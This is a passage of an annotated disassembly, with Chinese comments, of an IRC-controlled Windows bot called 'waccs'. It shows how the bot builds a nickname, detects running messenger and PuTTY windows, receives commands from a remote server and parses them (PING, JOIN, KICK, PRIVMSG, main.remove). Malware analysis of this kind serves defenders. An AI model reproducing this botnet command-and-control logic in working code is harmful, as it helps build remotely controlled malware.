SS:[EBP-24],EAX 0040127D 837D DC 0A CMP DWORD PTR SS:[EBP-24],0A 00401281 73 19 JNB SHORT waccs.0040129C ; 生成10位随机数. 00401283 E8 BE5D0000 CALL waccs.00407046 ; JMP 到 msvcrt.rand(生成随机数). 00401288 33D2 XOR EDX,EDX 0040128A 6A 24 PUSH 24 0040128C 59 POP ECX 0040128D F7F1 DIV ECX 0040128F 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24] 00401292 8A4C15 B4 MOV CL,BYTE PTR SS:[EBP+EDX-4C] 00401296 884C05 E0 MOV BYTE PTR SS:[EBP+EAX-20],CL 0040129A ^ EB DA JMP SHORT waccs.00401276 0040129C 6A 04 PUSH 4 ; /BufSize = 4 0040129E 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 004012A1 50 PUSH EAX ; |Buffer = 0012F778 004012A2 6A 07 PUSH 7 ; |InfoType = 7 004012A4 68 00080000 PUSH 800 ; |LocaleId = 800 004012A9 FF15 64804000 CALL DWORD PTR DS:[408064] ; kernel32.GetLocaleInfoA(获取设置参数). 004012AF 6A 00 PUSH 0 004012B1 68 52362A35 PUSH 352A3652 004012B6 8D4D 98 LEA ECX,DWORD PTR SS:[EBP-68] 004012B9 E8 78120000 CALL waccs.00402536 ; ASCII "tSkMainForm.UnicodeClass" 004012BE 50 PUSH EAX ; Class = "tSkMainForm.UnicodeClass" 004012BF FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 004012C5 85C0 TEST EAX,EAX 004012C7 74 0C JE SHORT waccs.004012D5 004012C9 C785 10FFFFFF 7>MOV DWORD PTR SS:[EBP-F0],waccs.00409074 004012D3 EB 0A JMP SHORT waccs.004012DF 004012D5 C785 10FFFFFF B>MOV DWORD PTR SS:[EBP-F0],waccs.0040A0B8 004012DF 6A 00 PUSH 0 004012E1 68 63E1E390 PUSH 90E3E163 004012E6 8D4D 90 LEA ECX,DWORD PTR SS:[EBP-70] 004012E9 E8 E8110000 CALL waccs.004024D6 ; ASCII "PuTTY" 004012EE 50 PUSH EAX 004012EF FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 004012F5 85C0 TEST EAX,EAX 004012F7 74 0C JE SHORT waccs.00401305 004012F9 C785 0CFFFFFF 8>MOV DWORD PTR SS:[EBP-F4],waccs.00409080 00401303 EB 0A JMP SHORT waccs.0040130F 00401305 C785 0CFFFFFF B>MOV DWORD PTR SS:[EBP-F4],waccs.0040A0BC 0040130F 6A 00 PUSH 0 00401311 68 698783CA PUSH CA838769 00401316 8D4D 84 LEA ECX,DWORD PTR SS:[EBP-7C] 00401319 E8 58110000 CALL waccs.00402476 0040131E 50 PUSH EAX ; ASCII "TFrmMain" 0040131F FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 00401325 85C0 TEST EAX,EAX 00401327 74 0C JE SHORT waccs.00401335 00401329 C785 08FFFFFF 9>MOV DWORD PTR SS:[EBP-F8],waccs.00409090 00401333 EB 0A JMP SHORT waccs.0040133F 00401335 C785 08FFFFFF C>MOV DWORD PTR SS:[EBP-F8],waccs.0040A0C0 0040133F 6A 00 PUSH 0 00401341 68 D452AC45 PUSH 45AC52D4 00401346 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C] 0040134C E8 C5100000 CALL waccs.00402416 00401351 50 PUSH EAX ; ASCII "YahooBuddyMain" 00401352 FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 00401358 85C0 TEST EAX,EAX 0040135A 74 0C JE SHORT waccs.00401368 0040135C C785 04FFFFFF A>MOV DWORD PTR SS:[EBP-FC],waccs.004090A4 00401366 EB 0A JMP SHORT waccs.00401372 00401368 C785 04FFFFFF C>MOV DWORD PTR SS:[EBP-FC],waccs.0040A0C4 00401372 6A 00 PUSH 0 00401374 68 ED96D04C PUSH 4CD096ED 00401379 8D8D 64FFFFFF LEA ECX,DWORD PTR SS:[EBP-9C] 0040137F E8 32100000 CALL waccs.004023B6 00401384 50 PUSH EAX ; ASCII "MSBLWindowClass" 00401385 FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 0040138B 85C0 TEST EAX,EAX 0040138D 74 0C JE SHORT waccs.0040139B 0040138F C785 00FFFFFF B>MOV DWORD PTR SS:[EBP-100],waccs.004090B> 00401399 EB 0A JMP SHORT waccs.004013A5 0040139B C785 00FFFFFF C>MOV DWORD PTR SS:[EBP-100],waccs.0040A0C> 004013A5 6A 00 PUSH 0 004013A7 68 64E255AD PUSH AD55E264 004013AC 8D8D 50FFFFFF LEA ECX,DWORD PTR SS:[EBP-B0] 004013B2 E8 9F0F0000 CALL waccs.00402356 004013B7 50 PUSH EAX ; ASCII "_Oscar_StatusNotify" 004013B8 FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 004013BE 85C0 TEST EAX,EAX 004013C0 74 0C JE SHORT waccs.004013CE 004013C2 C785 FCFEFFFF D>MOV DWORD PTR SS:[EBP-104],waccs.004090D> 004013CC EB 0A JMP SHORT waccs.004013D8 004013CE C785 FCFEFFFF C>MOV DWORD PTR SS:[EBP-104],waccs.0040A0C> 004013D8 6A 00 PUSH 0 004013DA 68 B7B86706 PUSH 667B8B7 004013DF 8D8D 3CFFFFFF LEA ECX,DWORD PTR SS:[EBP-C4] 004013E5 E8 0C0F0000 CALL waccs.004022F6 004013EA 50 PUSH EAX ; ASCII "__oxFrame.class__" 004013EB FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 004013F1 85C0 TEST EAX,EAX 004013F3 74 0C JE SHORT waccs.00401401 004013F5 C785 F8FEFFFF E>MOV DWORD PTR SS:[EBP-108],waccs.004090E> 004013FF EB 0A JMP SHORT waccs.0040140B 00401401 C785 F8FEFFFF D>MOV DWORD PTR SS:[EBP-108],waccs.0040A0D> 0040140B 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 0040140E 50 PUSH EAX 0040140F 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 00401412 50 PUSH EAX 00401413 FFB5 10FFFFFF PUSH DWORD PTR SS:[EBP-F0] 00401419 FFB5 0CFFFFFF PUSH DWORD PTR SS:[EBP-F4] 0040141F FFB5 08FFFFFF PUSH DWORD PTR SS:[EBP-F8] 00401425 FFB5 04FFFFFF PUSH DWORD PTR SS:[EBP-FC] 0040142B FFB5 00FFFFFF PUSH DWORD PTR SS:[EBP-100] 00401431 FFB5 FCFEFFFF PUSH DWORD PTR SS:[EBP-104] 00401437 FFB5 F8FEFFFF PUSH DWORD PTR SS:[EBP-108] 0040143D E8 6D270000 CALL waccs.00403BAF ; 排列数据. 00401442 50 PUSH EAX 00401443 68 D82E8AAE PUSH AE8A2ED8 00401448 8D8D 20FFFFFF LEA ECX,DWORD PTR SS:[EBP-E0] 0040144E E8 430E0000 CALL waccs.00402296 ; ASCII "\%0.2u%s%s%s%s%s%s%s\%3s\%s" 00401453 50 PUSH EAX 00401454 6A 1E PUSH 1E 00401456 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401459 05 EC000000 ADD EAX,0EC 0040145E 50 PUSH EAX 0040145F E8 DC5B0000 CALL waccs.00407040 ; JMP 到 msvcrt._snprintf(ASCII "\00F\CHN\zsocxb7vm9"). 00401464 83C4 34 ADD ESP,34 00401467 8D8D 20FFFFFF LEA ECX,DWORD PTR SS:[EBP-E0] 0040146D E8 4C0A0000 CALL waccs.00401EBE ; 清除内存数据. 00401472 8D8D 3CFFFFFF LEA ECX,DWORD PTR SS:[EBP-C4] 00401478 E8 690A0000 CALL waccs.00401EE6 ; 清除内存数据. 0040147D 8D8D 50FFFFFF LEA ECX,DWORD PTR SS:[EBP-B0] 00401483 E8 860A0000 CALL waccs.00401F0E ; 清除内存数据. 00401488 8D8D 64FFFFFF LEA ECX,DWORD PTR SS:[EBP-9C] 0040148E E8 A30A0000 CALL waccs.00401F36 ; 清除内存数据. 00401493 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C] 00401499 E8 C00A0000 CALL waccs.00401F5E ; 清除内存数据. 0040149E 8D4D 84 LEA ECX,DWORD PTR SS:[EBP-7C] 004014A1 E8 200C0000 CALL waccs.004020C6 ; 清除内存数据. 004014A6 8D4D 90 LEA ECX,DWORD PTR SS:[EBP-70] 004014A9 E8 D80A0000 CALL waccs.00401F86 ; 清除内存数据. 004014AE 8D4D 98 LEA ECX,DWORD PTR SS:[EBP-68] 004014B1 E8 F80A0000 CALL waccs.00401FAE ; 清除内存数据. 004014B6 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004014B9 05 EC000000 ADD EAX,0EC 004014BE 50 PUSH EAX 004014BF 68 2B298D3A PUSH 3A8D292B 004014C4 8D8D 14FFFFFF LEA ECX,DWORD PTR SS:[EBP-EC] 004014CA E8 C7100000 CALL waccs.00402596 ; ASCII "NICK %s" 004014CF 50 PUSH EAX 004014D0 FF75 08 PUSH DWORD PTR SS:[EBP+8] 004014D3 E8 28FBFFFF CALL waccs.00401000 ; 构造发送数据包(格式:NICK %s). 004014D8 83C4 0C ADD ESP,0C 004014DB 0FB6C0 MOVZX EAX,AL 004014DE F7D8 NEG EAX 004014E0 1BC0 SBB EAX,EAX 004014E2 40 INC EAX 004014E3 8885 1CFFFFFF MOV BYTE PTR SS:[EBP-E4],AL 004014E9 8D8D 14FFFFFF LEA ECX,DWORD PTR SS:[EBP-EC] 004014EF E8 E20A0000 CALL waccs.00401FD6 ; 清除内存数据. 004014F4 0FB685 1CFFFFFF MOVZX EAX,BYTE PTR SS:[EBP-E4] 004014FB 85C0 TEST EAX,EAX 004014FD 74 04 JE SHORT waccs.00401503 004014FF 32C0 XOR AL,AL 00401501 EB 02 JMP SHORT waccs.00401505 00401503 B0 01 MOV AL,1 00401505 5F POP EDI 00401506 5E POP ESI 00401507 C9 LEAVE 00401508 C3 RETN ; 返回. 接收从骇客服务器返回的数据包,根据包中骇客定义好的“指令”执行相应的恶意操作: 00401509 55 PUSH EBP 0040150A 8BEC MOV EBP,ESP 0040150C B8 14100000 MOV EAX,1014 00401511 E8 4A5B0000 CALL waccs.00407060 ; 初始化内存数据为空. 00401516 8D85 00F0FFFF LEA EAX,DWORD PTR SS:[EBP-1000] 0040151C 8985 FCEFFFFF MOV DWORD PTR SS:[EBP-1004],EAX 00401522 68 00100000 PUSH 1000 00401527 6A 00 PUSH 0 00401529 8D85 00F0FFFF LEA EAX,DWORD PTR SS:[EBP-1000] 0040152F 50 PUSH EAX 00401530 E8 055B0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401535 83C4 0C ADD ESP,0C 00401538 6A 00 PUSH 0 ; /Flags = 0 0040153A 68 00100000 PUSH 1000 ; |BufSize = 1000 (4096.) 0040153F 8D85 00F0FFFF LEA EAX,DWORD PTR SS:[EBP-1000] 00401545 50 PUSH EAX ; |Buffer = 0012E7C8 00401546 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401549 FF30 PUSH DWORD PTR DS:[EAX] ; |Socket = CC 0040154B FF15 E4814000 CALL DWORD PTR DS:[4081E4] ; WS2_32.recv(接收骇客远程服务器反回的数据指令包). 00401551 8985 F4EFFFFF MOV DWORD PTR SS:[EBP-100C],EAX 00401557 83BD F4EFFFFF 0>CMP DWORD PTR SS:[EBP-100C],0 0040155E 74 09 JE SHORT waccs.00401569 00401560 83BD F4EFFFFF F>CMP DWORD PTR SS:[EBP-100C],-1 00401567 75 0F JNZ SHORT waccs.00401578 00401569 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040156C FF30 PUSH DWORD PTR DS:[EAX] 0040156E FF15 C8814000 CALL DWORD PTR DS:[4081C8] ; WS2_32.closesocket(关闭连接). 00401574 32C0 XOR AL,AL 00401576 EB 6F JMP SHORT waccs.004015E7 00401578 68 44F2FD81 PUSH 81FDF244 0040157D 8D8D ECEFFFFF LEA ECX,DWORD PTR SS:[EBP-1014] 00401583 E8 6E100000 CALL waccs.004025F6 ; ASCII "\n" 00401588 50 PUSH EAX 00401589 FFB5 FCEFFFFF PUSH DWORD PTR SS:[EBP-1004] 0040158F E8 BE5A0000 CALL waccs.00407052 ; JMP 到 msvcrt.strstr 00401594 59 POP ECX 00401595 59 POP ECX 00401596 8985 F8EFFFFF MOV DWORD PTR SS:[EBP-1008],EAX 0040159C 8B85 F8EFFFFF MOV EAX,DWORD PTR SS:[EBP-1008] 004015A2 8985 F0EFFFFF MOV DWORD PTR SS:[EBP-1010],EAX 004015A8 8D8D ECEFFFFF LEA ECX,DWORD PTR SS:[EBP-1014] 004015AE E8 4B0A0000 CALL waccs.00401FFE ; 清除内存数据. 004015B3 83BD F0EFFFFF 0>CMP DWORD PTR SS:[EBP-1010],0 004015BA 74 29 JE SHORT waccs.004015E5 004015BC 8B85 F8EFFFFF MOV EAX,DWORD PTR SS:[EBP-1008] 004015C2 8020 00 AND BYTE PTR DS:[EAX],0 004015C5 FFB5 FCEFFFFF PUSH DWORD PTR SS:[EBP-1004] 004015CB FF75 08 PUSH DWORD PTR SS:[EBP+8] 004015CE E8 16000000 CALL waccs.004015E9 ; 解析从骇客服务器反回的数据包,根据包中骇客定义好的“指令”执行相应的恶意操作. 004015D3 59 POP ECX 004015D4 59 POP ECX 004015D5 8B85 F8EFFFFF MOV EAX,DWORD PTR SS:[EBP-1008] 004015DB 40 INC EAX 004015DC 40 INC EAX 004015DD 8985 FCEFFFFF MOV DWORD PTR SS:[EBP-1004],EAX 004015E3 ^ EB 93 JMP SHORT waccs.00401578 004015E5 B0 01 MOV AL,1 004015E7 C9 LEAVE 004015E8 C3 RETN ; 返回. 解析从骇客服务器反回的数据包,根据包中骇客定义好的“指令”执行相应的恶意操作(由于此函数内部代码过于烦琐,所以相应的省略了部分注解): 004015E9 55 PUSH EBP 004015EA 8BEC MOV EBP,ESP 004015EC 81EC B40B0000 SUB ESP,0BB4 004015F2 57 PUSH EDI 004015F3 83A5 64FEFFFF 0>AND DWORD PTR SS:[EBP-19C],0 004015FA 6A 63 PUSH 63 004015FC 59 POP ECX 004015FD 33C0 XOR EAX,EAX 004015FF 8DBD 68FEFFFF LEA EDI,DWORD PTR SS:[EBP-198] 00401605 F3:AB REP STOS DWORD PTR ES:[EDI] 00401607 8365 F4 00 AND DWORD PTR SS:[EBP-C],0 0040160B 68 14914000 PUSH waccs.00409114 00401610 FF75 0C PUSH DWORD PTR SS:[EBP+C] 00401613 E8 3A5A0000 CALL waccs.00407052 ; JMP 到 msvcrt.strstr 00401618 59 POP ECX 00401619 59 POP ECX 0040161A 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 0040161D 837D F8 00 CMP DWORD PTR SS:[EBP-8],0 00401621 74 23 JE SHORT waccs.00401646 00401623 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] 00401626 8020 00 AND BYTE PTR DS:[EAX],0 00401629 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 0040162C 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] 0040162F 898C85 64FEFFFF MOV DWORD PTR SS:[EBP+EAX*4-19C],ECX 00401636 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] 00401639 40 INC EAX 0040163A 8945 0C MOV DWORD PTR SS:[EBP+C],EAX 0040163D 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 00401640 40 INC EAX 00401641 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 00401644 ^ EB C5 JMP SHORT waccs.0040160B 00401646 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 00401649 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] 0040164C 898C85 64FEFFFF MOV DWORD PTR SS:[EBP+EAX*4-19C],ECX 00401653 C745 FC 0400000>MOV DWORD PTR SS:[EBP-4],4 0040165A 83BD 64FEFFFF 0>CMP DWORD PTR SS:[EBP-19C],0 00401661 74 09 JE SHORT waccs.0040166C 00401663 83BD 68FEFFFF 0>CMP DWORD PTR SS:[EBP-198],0 0040166A 75 05 JNZ SHORT waccs.00401671 0040166C E9 22080000 JMP waccs.00401E93 00401671 FFB5 64FEFFFF PUSH DWORD PTR SS:[EBP-19C] 00401677 68 5D2573B7 PUSH B773255D 0040167C 8D8D 00F5FFFF LEA ECX,DWORD PTR SS:[EBP-B00] 00401682 E8 CF0F0000 CALL waccs.00402656 ; ASCII "PING" 00401687 50 PUSH EAX 00401688 E8 155A0000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"PING"). 0040168D 59 POP ECX 0040168E 59 POP ECX 0040168F F7D8 NEG EAX 00401691 1BC0 SBB EAX,EAX 00401693 40 INC EAX 00401694 8885 08F5FFFF MOV BYTE PTR SS:[EBP-AF8],AL 0040169A 8D8D 00F5FFFF LEA ECX,DWORD PTR SS:[EBP-B00] 004016A0 E8 81090000 CALL waccs.00402026 ; 清除内存数据. 004016A5 0FB685 08F5FFFF MOVZX EAX,BYTE PTR SS:[EBP-AF8] 004016AC 85C0 TEST EAX,EAX 004016AE 74 3F JE SHORT waccs.004016EF ; 判断是否该执行"PING"命令. 004016B0 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004016B3 05 BA000000 ADD EAX,0BA 004016B8 50 PUSH EAX 004016B9 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004016BC 05 A1000000 ADD EAX,0A1 004016C1 50 PUSH EAX 004016C2 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 004016C8 68 5BF5ABE4 PUSH E4ABF55B 004016CD 8D8D F8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B08] 004016D3 E8 DE0F0000 CALL waccs.004026B6 ; ASCII "PONG %s" 004016D8 50 PUSH EAX 004016D9 FF75 08 PUSH DWORD PTR SS:[EBP+8] 004016DC E8 1FF9FFFF CALL waccs.00401000 ; 构造发送数据包(格式:"PONG %s"). 004016E1 83C4 14 ADD ESP,14 004016E4 8D8D F8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B08] 004016EA E8 E7080000 CALL waccs.00401FD6 ; 清除内存数据. 004016EF FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 004016F5 68 1B2CF4BE PUSH BEF42C1B 004016FA 8D8D F0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B10] 00401700 E8 11100000 CALL waccs.00402716 ; ASCII "001" 00401705 50 PUSH EAX 00401706 E8 97590000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"001"). 0040170B 59 POP ECX 0040170C 59 POP ECX 0040170D F7D8 NEG EAX 0040170F 1BC0 SBB EAX,EAX 00401711 40 INC EAX 00401712 8885 F4F4FFFF MOV BYTE PTR SS:[EBP-B0C],AL 00401718 8D8D F0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B10] 0040171E E8 2B090000 CALL waccs.0040204E ; 清除内存数据. 00401723 0FB685 F4F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B0C] 0040172A 85C0 TEST EAX,EAX 0040172C 74 39 JE SHORT waccs.00401767 ; 判断是否该执行"001"命令. 0040172E 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401731 05 BA000000 ADD EAX,0BA 00401736 50 PUSH EAX 00401737 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040173A 05 A1000000 ADD EAX,0A1 0040173F 50 PUSH EAX 00401740 68 CCADB02E PUSH 2EB0ADCC 00401745 8D8D E4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B1C] 0040174B E8 26100000 CALL waccs.00402776 ; ASCII "JOIN %s %s". 00401750 50 PUSH EAX 00401751 FF75 08 PUSH DWORD PTR SS:[EBP+8] 00401754 E8 A7F8FFFF CALL waccs.00401000 ; 构造发送数据包(格式:"JOIN %s %s"). 00401759 83C4 10 ADD ESP,10 0040175C 8D8D E4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B1C] 00401762 E8 0F090000 CALL waccs.00402076 ; 清除内存数据. 00401767 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 0040176D 68 3B99B737 PUSH 37B7993B 00401772 8D8D D8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B28] 00401778 E8 59100000 CALL waccs.004027D6 ; ASCII "KICK" 0040177D 50 PUSH EAX 0040177E E8 1F590000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"KICK"). 00401783 59 POP ECX 00401784 59 POP ECX 00401785 85C0 TEST EAX,EAX 00401787 75 64 JNZ SHORT waccs.004017ED 00401789 FFB5 6CFEFFFF PUSH DWORD PTR SS:[EBP-194] 0040178F 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401792 05 A1000000 ADD EAX,0A1 00401797 50 PUSH EAX 00401798 E8 05590000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(近一步指令识别,判断指令只否为"##ghetto##"). 0040179D 59 POP ECX 0040179E 59 POP ECX 0040179F F7D8 NEG EAX 004017A1 1BC0 SBB EAX,EAX 004017A3 40 INC EAX 004017A4 8885 D4F4FFFF MOV BYTE PTR SS:[EBP-B2C],AL 004017AA 0FB685 D4F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B2C] 004017B1 85C0 TEST EAX,EAX 004017B3 74 38 JE SHORT waccs.004017ED 004017B5 FFB5 70FEFFFF PUSH DWORD PTR SS:[EBP-190] 004017BB 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004017BE 05 EC000000 ADD EAX,0EC 004017C3 50 PUSH EAX 004017C4 E8 D9580000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(近一步指令识别). 004017C9 59 POP ECX 004017CA 59 POP ECX 004017CB F7D8 NEG EAX 004017CD 1BC0 SBB EAX,EAX 004017CF 40 INC EAX 004017D0 8885 D0F4FFFF MOV BYTE PTR SS:[EBP-B30],AL 004017D6 0FB685 D0F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B30] 004017DD 85C0 TEST EAX,EAX 004017DF 74 0C JE SHORT waccs.004017ED 004017E1 C785 50F4FFFF 0>MOV DWORD PTR SS:[EBP-BB0],1 004017EB EB 07 JMP SHORT waccs.004017F4 004017ED 83A5 50F4FFFF 0>AND DWORD PTR SS:[EBP-BB0],0 004017F4 8A85 50F4FFFF MOV AL,BYTE PTR SS:[EBP-BB0] 004017FA 8885 E0F4FFFF MOV BYTE PTR SS:[EBP-B20],AL 00401800 8D8D D8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B28] 00401806 E8 1B080000 CALL waccs.00402026 ; 清除内存数据. 0040180B 0FB685 E0F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B20] 00401812 85C0 TEST EAX,EAX 00401814 74 39 JE SHORT waccs.0040184F ; 判断是否该执行"KICK"命令. 00401816 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401819 05 BA000000 ADD EAX,0BA 0040181E 50 PUSH EAX 0040181F 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401822 05 A1000000 ADD EAX,0A1 00401827 50 PUSH EAX 00401828 68 8CA52F28 PUSH 282FA58C 0040182D 8D8D C4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B3C] 00401833 E8 FE0F0000 CALL waccs.00402836 ; ASCII "JOIN %s %s" 00401838 50 PUSH EAX 00401839 FF75 08 PUSH DWORD PTR SS:[EBP+8] 0040183C E8 BFF7FFFF CALL waccs.00401000 ; 构造发送数据包. 00401841 83C4 10 ADD ESP,10 00401844 8D8D C4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B3C] 0040184A E8 27080000 CALL waccs.00402076 ; 清除内存数据. 0040184F FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 00401855 68 4C914000 PUSH waccs.0040914C ; ASCII "332" 0040185A E8 43580000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"332"). 0040185F 59 POP ECX 00401860 59 POP ECX 00401861 85C0 TEST EAX,EAX 00401863 75 0C JNZ SHORT waccs.00401871 ; 判断是否该执行"332"命令. 00401865 C745 FC 0500000>MOV DWORD PTR SS:[EBP-4],5 0040186C E9 9C000000 JMP waccs.0040190D 00401871 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 00401877 68 3F38E862 PUSH 62E8383F 0040187C 8D8D B8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B48] 00401882 E8 0F100000 CALL waccs.00402896 ; ASCII "PRIVMSG" 00401887 50 PUSH EAX 00401888 E8 15580000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"PRIVMSG"). 0040188D 59 POP ECX 0040188E 59 POP ECX 0040188F 85C0 TEST EAX,EAX 00401891 74 4C JE SHORT waccs.004018DF ; 判断是否该执行"PRIVMSG"命令. 00401893 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 00401899 68 3FCE37DE PUSH DE37CE3F 0040189E 8D8D B0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B50] 004018A4 E8 4D100000 CALL waccs.004028F6 ; ASCII "332" 004018A9 50 PUSH EAX 004018AA E8 F3570000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"332"). 004018AF 59 POP ECX 004018B0 59 POP ECX 004018B1 F7D8 NEG EAX 004018B3 1BC0 SBB EAX,EAX 004018B5 F7D8 NEG EAX 004018B7 8885 B4F4FFFF MOV BYTE PTR SS:[EBP-B4C],AL 004018BD 8D8D B0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B50] 004018C3 E8 86070000 CALL waccs.0040204E ; 清除内存数据. 004018C8 0FB685 B4F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B4C] 004018CF 85C0 TEST EAX,EAX 004018D1 74 0C JE SHORT waccs.004018DF ; 判断是否该执行"332"命令. 004018D3 C785 4CF4FFFF 0>MOV DWORD PTR SS:[EBP-BB4],1 004018DD EB 07 JMP SHORT waccs.004018E6 004018DF 83A5 4CF4FFFF 0>AND DWORD PTR SS:[EBP-BB4],0 004018E6 8A85 4CF4FFFF MOV AL,BYTE PTR SS:[EBP-BB4] 004018EC 8885 C0F4FFFF MOV BYTE PTR SS:[EBP-B40],AL 004018F2 8D8D B8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B48] 004018F8 E8 D9060000 CALL waccs.00401FD6 ; 清除内存数据. 004018FD 0FB685 C0F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B40] 00401904 85C0 TEST EAX,EAX 00401906 74 05 JE SHORT waccs.0040190D 00401908 E9 86050000 JMP waccs.00401E93 ; 返回(退出)该函数. 0040190D 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401910 8B8485 60FEFFFF MOV EAX,DWORD PTR SS:[EBP+EAX*4-1A0] 00401917 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 0040191A 8B8C8D 60FEFFFF MOV ECX,DWORD PTR SS:[EBP+ECX*4-1A0] 00401921 41 INC ECX 00401922 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4] 00401925 898C95 60FEFFFF MOV DWORD PTR SS:[EBP+EDX*4-1A0],ECX 0040192C 85C0 TEST EAX,EAX 0040192E 74 0D JE SHORT waccs.0040193D 00401930 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401933 83BC85 64FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-19C],0 0040193B 75 05 JNZ SHORT waccs.00401942 0040193D E9 51050000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401942 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401945 05 EC000000 ADD EAX,0EC 0040194A 50 PUSH EAX 0040194B 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 0040194E FFB485 60FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-1A0] 00401955 E8 61250000 CALL waccs.00403EBB ; 数据处理. 0040195A 59 POP ECX 0040195B 59 POP ECX 0040195C 85C0 TEST EAX,EAX 0040195E 74 05 JE SHORT waccs.00401965 00401960 E9 2E050000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401965 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401968 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-19C] 0040196F 68 DD341F7F PUSH 7F1F34DD 00401974 8D8D A0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B60] 0040197A E8 D70F0000 CALL waccs.00402956 ; ASCII "main.remove" 0040197F 50 PUSH EAX 00401980 E8 1D570000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"main.remove"). 00401985 59 POP ECX 00401986 59 POP ECX 00401987 F7D8 NEG EAX 00401989 1BC0 SBB EAX,EAX 0040198B 40 INC EAX 0040198C 8885 ACF4FFFF MOV BYTE PTR SS:[EBP-B54],AL 00401992 8D8D A0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B60] 00401998 E8 01070000 CALL waccs.0040209E ; 清除内存数据. 0040199D 0FB685 ACF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B54] 004019A4 85C0 TEST EAX,EAX 004019A6 74 4A JE SHORT waccs.004019F2 ; 判断是否该执行"main.remove"命令. 004019A8 68 34BB33D5 PUSH D533BB34 004019AD 8D8D 90F4FFFF LEA ECX,DWORD PTR SS:[EBP-B70] 004019B3 E8 FE0F0000 CALL waccs.004029B6 ; ASCII "QUIT :Removing" 004019B8 50 PUSH EAX 004019B9 FF75 08 PUSH DWORD PTR SS:[EBP+8] 004019BC E8 3FF6FFFF CALL waccs.00401000 ; 构造发送数据包. 004019C1 59 POP ECX 004019C2 59 POP ECX 004019C3 8D8D 90F4FFFF LEA ECX,DWORD PTR SS:[EBP-B70] 004019C9 E8 90050000 